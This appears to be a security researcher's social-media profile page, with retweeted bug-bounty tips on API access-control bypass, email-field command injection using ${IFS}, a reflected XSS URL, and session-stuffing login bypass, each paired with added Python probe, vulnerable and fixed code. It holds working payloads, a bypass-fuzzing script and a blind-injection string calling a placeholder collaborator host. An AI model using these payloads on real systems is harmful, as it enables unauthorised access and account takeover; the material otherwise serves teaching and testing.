Amit Kumar 🇮🇳 (@Amitlt2)

346 posts

Microsoft Q1 Top Researcher 2022 & Secured 100+ Applications | Web, API and Android Pentester | Security Analyst | Philophobia Guy |

Kolkata, India | Joined July 2020
405 Following | 451 Followers
Amit Kumar 🇮🇳 retweeted
DarkShadow @darkshadow2bd
🔥 API restriction bypass using a fake parameter ☠️
/api/public => unauthorized
/api/public/latest?anything=/api/public => 200 OK
You can FUZZ like: ?admin=true, ?bypass=1, ?debug=true, OR add the header "X-Custom-IP-Authorization: 127.0.0.1"
Join my telegram t.me/ShellSec
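The probe below is an added example (my code, not DarkShadow's) that automates the three ideas in the tweet: an extra path segment whose query parameter repeats the original path, a few "fake" parameters, and IP-spoofing headers. It only reports a variant as a hit when the unmodified path returns 401/403 and the variant returns 2xx, since a 404 on a variant proves nothing. The `fake_server` function is a constructed, deliberately misconfigured target so the script runs offline; the header list extends the tweet's single header with two common companions, which is my assumption, not the post's.

```python
"""Probe a restricted API path for the parameter / header bypasses from the tweet.

Added example. Target URL, fake server and the extra X-Forwarded-For /
X-Originating-IP headers are constructed or assumed; the rest follows the post.
"""
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

FAKE_PARAMS = {"admin": "true", "bypass": "1", "debug": "true"}   # from the tweet
SPOOF_HEADERS = {                                                   # tweet + assumed companions
    "X-Custom-IP-Authorization": "127.0.0.1",
    "X-Forwarded-For": "127.0.0.1",
    "X-Originating-IP": "127.0.0.1",
}


def build_candidates(path: str) -> list[tuple[str, dict[str, str]]]:
    """Return (path_with_query, extra_headers) variants to compare against the baseline."""
    cands = []
    # 1. appended segment whose query parameter names the original path
    cands.append((f"{path}/latest?{urlencode({'anything': path})}", {}))
    # 2. one fake parameter at a time on the unmodified path
    for key, val in FAKE_PARAMS.items():
        cands.append((f"{path}?{urlencode({key: val})}", {}))
    # 3. one spoofing header at a time, path untouched
    for hdr, val in SPOOF_HEADERS.items():
        cands.append((path, {hdr: val}))
    return cands


def http_status(base: str, path: str, headers: dict[str, str]) -> int:
    """Real sender: HTTP status for base+path; HTTPError carries the status too."""
    req = Request(base + path, headers={"User-Agent": "bypass-check", **headers})
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def find_bypasses(path: str, send) -> list[tuple[str, dict[str, str], int]]:
    """send(path, headers) -> status code.
    Only a restricted baseline (401/403) followed by a 2xx on a variant counts."""
    baseline = send(path, {})
    if baseline not in (401, 403):
        return []                       # nothing restricted here to bypass
    hits = []
    for cand_path, hdrs in build_candidates(path):
        code = send(cand_path, hdrs)
        if 200 <= code < 300:
            hits.append((cand_path, hdrs, code))
    return hits


def fake_server(path: str, headers: dict[str, str]) -> int:
    """Constructed vulnerable target: the deny rule matches only the exact route
    '/api/public' (so any extra segment slips past it), and the app trusts the
    X-Custom-IP-Authorization header as proof the caller is local."""
    route = path.split("?", 1)[0]
    if headers.get("X-Custom-IP-Authorization") == "127.0.0.1":
        return 200
    if route == "/api/public":
        return 401
    if route.startswith("/api/public/"):
        return 200                      # handler reachable, check never ran
    return 404


if __name__ == "__main__":
    import sys
    base_url, target_path = sys.argv[1], sys.argv[2]   # e.g. https://target.example /api/public
    for p, h, status in find_bypasses(target_path, lambda p, h: http_status(base_url, p, h)):
        print(status, p, h)
```

Against the constructed server the probe flags exactly the two patterns the tweet shows (the appended segment and the spoofed IP header); the fake parameters alone do not flip the status, which is the usual outcome and why they are worth fuzzing in bulk rather than by hand.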
Amit Kumar 🇮🇳 retweeted
Intigriti @intigriti
Want to find more vulnerabilities using BurpSuite match & replace rules? 🤑 Open this thread! 🧵 👇
Amit Kumar 🇮🇳 @Amitlt2
@hackerspider1 @KiaInd @Apple @Tesla Totally agree. 💯 For me, @KiaInd stands out as the best option in this price segment in India. Premium features, strong quality, and real value for money. My 2022 Kia Carens has already done 42,000 km and I still don’t regret choosing it for a second.
Shubham Gupta 🇮🇳 @hackerspider1
Hi @KiaInd 👋 I own a 2021 Seltos DCT GTX+ driven just 25k km and still in love with it. I'm not a car enthusiast… I'm a tech enthusiast. That's why the new Seltos with ADAS + Digital Key 2 (especially the @Apple integration)... I love it. @Tesla is the dream, sure… but ₹70–80L dreams are a different level in India 🥲 Meanwhile Kia is out here bringing serious tech to real people. Respect for that. Now the only obstacle between me and the new Seltos? My mom. She said: "Car chal rahi hai na? Then why upgrade?" ("The car's still running, isn't it? Then why upgrade?") She's the real CEO at home. So @KiaInd… Should I listen to her… or should I listen to innovation? 😅 Maybe help me win this argument at home. Is there any smart upgrade/trade option for me that won't hit the wallet too hard?
Amit Kumar 🇮🇳 retweeted
DarkShadow @darkshadow2bd
💀 RCE in mail ☠️
On the login/register page:
1. Insert a normal mail and intercept it in Burp
2. Replace the mail with an OS command payload
3. Don't use spaces in the payload
4. Replace spaces with ${IFS}
5. Try blind OS injection using a Burp Collaborator URL
Join my telegram t.me/ShellSec
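To make the five steps concrete, here is an added example (mine, not DarkShadow's) of the bug those steps exploit and of the fix. `notify_vulnerable` is a constructed stand-in for a registration backend that shells out with the e-mail address interpolated into the command line; it even has the naive "no spaces" check that the `${IFS}` trick is designed to get past. `notify_safe` validates the address against an allow-list and passes it as an argv element, so no shell ever parses it. The `printf` command stands in for sendmail/mailx so the block runs offline; the blind-injection payload is shown as a string only and never executed, and the collaborator hostname in it is a placeholder.

```python
"""OS command injection through an e-mail field (the tweet's scenario) and its fix.

Added example. 'printf' stands in for the real mail helper; the payloads and
the collaborator placeholder are constructed.
"""
import re
import subprocess

# Allow-list: local part, '@', dotted domain. Rejects ';', '$', '{', quotes, etc.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

# Steps 2-4 of the tweet: a command appended with ';', spaces replaced by ${IFS}.
PAYLOAD = "victim@example.com;printf${IFS}'injected\\n'"
# Step 5: blind variant that calls out to a collaborator (placeholder host, not run here).
BLIND_PAYLOAD = "victim@example.com;curl${IFS}http://COLLABORATOR-PLACEHOLDER"


def naive_space_filter(email: str) -> bool:
    """The kind of check that 'blocks' injection by rejecting spaces. ${IFS} passes it."""
    return " " not in email


def notify_vulnerable(email: str) -> str:
    """BUG: untrusted input interpolated into a shell string, then run via sh -c.
    The shell expands ${IFS} to whitespace and field-splits, so 'cmd${IFS}arg' becomes
    'cmd arg' even though the raw input contained no space."""
    if not naive_space_filter(email):
        raise ValueError("spaces not allowed")
    cmd = f"printf 'queued:%s\\n' {email}"          # stand-in for: sendmail -t <email>
    done = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, check=False)
    return done.stdout


def is_valid_email(email: str) -> bool:
    return EMAIL_RE.fullmatch(email) is not None


def notify_safe(email: str) -> str:
    """FIX: allow-list validation plus argv list (no shell). Even if validation were
    weaker, the address would reach the program as a single argument, never as code."""
    if not is_valid_email(email):
        raise ValueError("invalid e-mail address")
    done = subprocess.run(["printf", "queued:%s\\n", email],
                          capture_output=True, text=True, check=False)
    return done.stdout


if __name__ == "__main__":
    print(repr(notify_vulnerable("alice@example.com")))
    print(repr(notify_vulnerable(PAYLOAD)))       # second line 'injected' proves execution
    print(repr(notify_safe("alice@example.com")))
```

Two things worth noting when you test for this. First, the naive filter really does pass the payload, so a 400 on a payload with literal spaces tells you nothing about whether `${IFS}` (or `$IFS$9`, `{cmd,arg}` brace expansion in bash, or tab characters) is blocked. Second, the hardened version fixes the class of bug, not the one payload: removing the shell is what matters, and the regex is only there to fail early with a useful error.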
Amit Kumar 🇮🇳 @Amitlt2
The bug bounty rollercoaster. I reported:
🔓 Critical data leak (15,000+ records): no reply
🎯 5 Reflected XSS findings: all marked duplicate
🔄 SSRF with internal access: no reply
Hunt continues! Consistency > instant wins.
#xss #bugbountytips #InfoSec #ssrf #Hacking
Amit Kumar 🇮🇳 @Amitlt2
DAY 1: Found Reflected XSS via the iconURL parameter 🕵️💰
https://Redacted/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
Portal: Marketplace manager
Bug: Reflected XSS
#XSS #BugBounty #WebSecurity #Hacking #InfoSec
Amit Kumar 🇮🇳 retweeted
the_IDORminator @the_IDORminator
Let's learn Auth Bypass via Session Stuffing! Easy P1s to find if the target is susceptible.

Ok, so what's "Session Stuffing"? In the wonderful land of server-side code, developers can use session variables to store information. These variables can be things like your username, your user id, your preferred pickup location for groceries, really anything. These variables are stored server side only, so in general, some action triggers creating or changing them. Imagine we have a variable scope called "session" (that stores the session variables). So we may have a "session.userId" and "session.userName" and "session.isLoggedIn".

Login Dialogue
When you enter the correct username and password on a login screen, the server could decide it wants to store your user name, and the fact that you are logged in. So server code may say "if session.isLoggedIn = true, do some lookup using session.userName". You with me?

Forgot Password
Nobody that is already logged in would need to hit a forgot password screen, right? So devs don't necessarily think of this use case. But imagine you open the forgot password screen intended for unauthenticated visitors, after already having logged in. Let's say the forgot password box asks for your username, so it can send you a password reset link or ask you a password reset question. It needs to know if you have an account first. It temporarily sets session.userName to whatever you type in.

Let's stuff this puppy
So what happens if we log in to Bob's account? Server sets:
session.isLoggedIn = true
session.userName = bob
Now, while still logged in, we pivot to the 'forgot password' tab. We key in username "tina". Server temporarily sets session.userName = "tina" to pull back password reset questions. Back on Bob's account page, I now hit refresh, and I'm now logged in and see all of Tina's information, and actually have become Tina.

What happened here?
The doofus devs used the same session variable for forgot password and login dialogues and did not force logout when utilizing password reset. So one page stuffs/replaces a variable in an already authenticated session, resulting in a total auth bypass for anyone else's account via username only.

Result? I've done this on some Fortune 10 websites, some banking software used by 1000s of banks, and on some electric utilities (all with permission). In the case of the online banking software, it was absolutely terrifying that something this dumb could have led to many, many millions in theft.

Make sure to test for dumb stuff like this! And people say hacking is hard... 😜
#CyberSecurity #infosec #bugbounty #Hacking
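The walkthrough above maps almost line for line onto code, so here is an added example (mine, not the_IDORminator's) with the vulnerable login / forgot-password / account-page trio next to a fixed trio. The session is a plain dict standing in for whatever server-side session store the framework provides; the users, passwords and reset questions are constructed. `stuffing_scenario` replays Bob's login, the "tina" entry on the forgot-password page, and the refresh of the account page, and returns whose account the page now shows.

```python
"""Session stuffing: one server-side variable shared by login and password reset,
and a fixed version. Added example; users and session store are constructed."""

USERS = {  # constructed test data
    "bob":  {"id": 1, "password": "hunter2",       "question": "First pet?",            "balance": 120},
    "tina": {"id": 2, "password": "correct-horse", "question": "Mother's maiden name?", "balance": 98000},
}


# ---------- vulnerable: session.userName does two jobs ----------
def login_vuln(session: dict, username: str, password: str) -> bool:
    user = USERS.get(username)
    if user and user["password"] == password:
        session["isLoggedIn"] = True
        session["userName"] = username
        return True
    return False


def forgot_password_vuln(session: dict, username: str):
    """Unauthenticated page that 'temporarily' stashes the typed name in the same key."""
    if username in USERS:
        session["userName"] = username              # the stuffing point
        return USERS[username]["question"]
    return None


def account_page_vuln(session: dict):
    """Identity is resolved from a key any visitor can overwrite."""
    if session.get("isLoggedIn"):
        return session["userName"]
    return None


# ---------- fixed: identity comes only from login, reset state has its own key ----------
def login_fixed(session: dict, username: str, password: str) -> bool:
    user = USERS.get(username)
    if user and user["password"] == password:
        session.clear()                             # drop anything pre-auth code stored
        session["uid"] = user["id"]                 # written here and nowhere else
        return True
    return False


def forgot_password_fixed(session: dict, username: str):
    if "uid" in session:
        session.clear()                             # force logout: reset is for anonymous users
    if username in USERS:
        session["pwreset_user"] = username          # separate key, never consulted for authz
        return USERS[username]["question"]          # (real code should answer uniformly to
    return None                                     #  avoid username enumeration)


def account_page_fixed(session: dict):
    uid = session.get("uid")
    for name, user in USERS.items():
        if user["id"] == uid:
            return name
    return None


def stuffing_scenario(login, forgot, account):
    """Bob logs in, opens 'forgot password' for tina, then refreshes his account page."""
    session = {}
    if not login(session, "bob", "hunter2"):
        raise RuntimeError("login failed")
    forgot(session, "tina")
    return account(session)


def normal_login(login, account):
    """Sanity check that both variants still serve Bob his own page."""
    session = {}
    login(session, "bob", "hunter2")
    return account(session)


if __name__ == "__main__":
    print("vulnerable:", stuffing_scenario(login_vuln, forgot_password_vuln, account_page_vuln))
    print("fixed:     ", stuffing_scenario(login_fixed, forgot_password_fixed, account_page_fixed))
```

The fixed version applies both corrections the thread names: the reset flow writes to its own key, so it cannot change who the session belongs to, and an authenticated session that reaches the reset page is terminated rather than left half-trusted. When testing a real target, the tell is the same as in the thread: log in as your own account, submit someone else's username (or an account you control) on the forgot-password form without logging out, then reload an authenticated page and see whose data comes back.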